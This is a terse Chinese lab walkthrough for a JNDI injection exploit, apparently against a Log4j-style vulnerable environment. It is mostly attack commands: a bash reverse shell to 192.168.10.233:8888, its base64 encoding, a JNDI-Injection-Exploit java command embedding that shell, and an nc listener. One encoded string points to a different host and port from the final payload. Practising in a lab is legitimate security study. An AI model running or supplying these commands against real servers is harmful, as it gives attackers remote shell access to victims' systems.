开启环境
进入主页
在DNSLOG平台上获取⼀个域名来监控注⼊
开始反弹Shell,下载一个JNDI-Injection-Explo到攻击机
bash -i >& /dev/tcp/192.168.10.233/8888 0>&1
反弹base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xMy82NjY2IDA+JjE=
最终payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIzMy84ODg4IDA+JjE=
}|{base64,-d}|{bash, -i}" -A "192.168.10.233"
监听nc -lvvp 8888
使用jdk1.8的payload直接访问